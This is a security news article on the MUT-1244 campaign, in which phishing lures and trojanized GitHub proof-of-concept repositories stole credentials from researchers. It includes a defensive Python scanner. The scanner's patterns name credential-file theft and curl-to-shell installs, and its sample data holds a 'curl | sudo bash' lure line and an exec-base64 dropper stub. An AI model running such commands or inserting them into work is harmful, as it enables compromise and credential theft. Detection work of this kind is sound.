Security researchers at Datadog Security Labs have uncovered a campaign targeting security professionals and researchers by a threat actor dubbed MUT-1244 (Mysterious Unattributed Threat).
The attackers used phishing emails and created fake repositories on GitHub disguised as legitimate proof-of-concept (PoC) code for known vulnerabilities. These repositories contained hidden malicious code that infiltrated targeted systems upon execution.
Delivery Methods
The attackers used two primary modes to deliver the payload. The first attack vector was a targeted phishing campaign that put academics in the crosshairs by using emails disguised as critical kernel updates. In order to obtain target email addresses, the attackers scraped 2,758 email addresses from arXiv. The attackers then launched an email campaign with emails containing instructions that prompted victims to execute shell commands, which installed the malware.

The second attack vector relied on trojanized GitHub repositories: the attackers created numerous fake GitHub accounts and published seemingly legitimate proof-of-concept (PoC) exploits for known CVEs that in reality concealed malicious code. The concealment techniques included backdoored configuration files, payloads embedded within PDF documents, Python droppers that executed the malware, and malicious npm packages pulled in as dependencies.

Regardless of how the attackers gained access, the second stage was the same: a malicious payload intended to establish persistent access to compromised systems, access confidential information, and exfiltrate data for the attackers' use. This payload could steal sensitive data like SSH keys and AWS credentials and even keep track of the victim's command history.
To the researchers' surprise, the attackers made a critical mistake: they left hardcoded credentials within the payload, granting access to the storage locations of the stolen data.
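One way to put "vet your tools before running them" into practice against the techniques described above: a static triage pass over a downloaded PoC repository that flags decode-and-execute droppers, readers of SSH, AWS and shell-history files, curl-to-shell install instructions like the phishing lure, npm dependencies fetched outside the registry, and hardcoded cloud key IDs. This is an added Python example, not Datadog's analysis code or anything from the campaign; the rule set, the file-suffix list and the sample repository contents are constructed for illustration.

```python
from __future__ import annotations
import re
from pathlib import Path

# Rules mirror the techniques described above: decode-then-exec droppers, credential-store
# readers, curl|sh installers, non-registry npm dependencies, and hardcoded AWS key IDs.
RULES = {
    "decode_then_exec": re.compile(r"\b(exec|eval)\s*\(.{0,80}(b64decode|unhexlify|fromhex)"),
    "reads_credential_store": re.compile(r"\.ssh/|\.aws/credentials|\.bash_history|id_rsa|id_ed25519"),
    "pipe_download_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "non_registry_dependency": re.compile(r'"[^"]+"\s*:\s*"(git\+|https?://|github:)'),
    "hardcoded_aws_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
}
SCAN_SUFFIXES = {".py", ".sh", ".json", ".yml", ".yaml", ".cfg", ".ini", ".env", ".txt", ".md", ""}

def scan_text(name: str, text: str) -> list[tuple[str, int, str]]:
    """Return one (rule, line_number, file) tuple per rule hit per line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES.items():
            if rule == "non_registry_dependency" and not name.endswith("package.json"):
                continue  # dependency sources are only meaningful inside package.json
            if pattern.search(line):
                hits.append((rule, line_no, name))
    return hits

def scan_files(files: dict[str, str]) -> list[tuple[str, int, str]]:
    """Scan an in-memory {relative_path: content} map, in path order."""
    return [hit for name, text in sorted(files.items()) for hit in scan_text(name, text)]

def scan_repo(root: Path) -> list[tuple[str, int, str]]:
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in root.rglob("*") if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES}
    return scan_files(files)

# Constructed sample repository; these lines are illustrative, not the campaign's code.
# The AWS key ID is the placeholder value used in AWS's own documentation.
SAMPLE_REPO = {
    "README.md": "Run: curl -s https://example.invalid/kernel-update.sh | sudo bash\n",
    "exploit.py": "import base64\nexec(base64.b64decode(PAYLOAD))\n",
    "config.ini": "[paths]\nkeys = ~/.ssh/id_rsa\n",
    "package.json": '{"dependencies": {"helper": "git+https://example.invalid/helper.git"}}\n',
    "settings.cfg": "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n",
}

if __name__ == "__main__":
    for rule, line_no, name in scan_files(SAMPLE_REPO):
        print(f"{name}:{line_no}: {rule}")
```

A hit is a reason to read the file by hand before running anything, not proof of compromise; run `scan_repo(Path("clone-dir"))` on a fresh clone and review every flagged line.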
Impact
The MUT-1244 campaign has compromised and continues to compromise dozens of security professionals, including red teamers and researchers, resulting in the theft of sensitive data such as private keys and credentials. Researchers have found that over 390,000 potentially valid WordPress credentials were exfiltrated. It is likely that MUT-1244 acquired these credentials from other malicious actors, probably through dark web marketplaces, and then used a trojanized credential checker to validate and further compromise them.

Conclusion
The MUT-1244 campaign is a reminder that attackers are getting better at targeting security researchers with easily accessible, seemingly harmless tools. The big takeaway here is to regularly vet your tools and sources—and that includes integrating automated threat intelligence feeds to proactively stay ahead of such threats. Security researchers are especially at risk because of their broad access, high privileges, and potential knowledge of unpatched vulnerabilities. Such campaigns should be a reminder of the importance of a "secure by design" approach, ensuring security is built into all systems, even those often neglected, like internal tools or less critical infrastructure.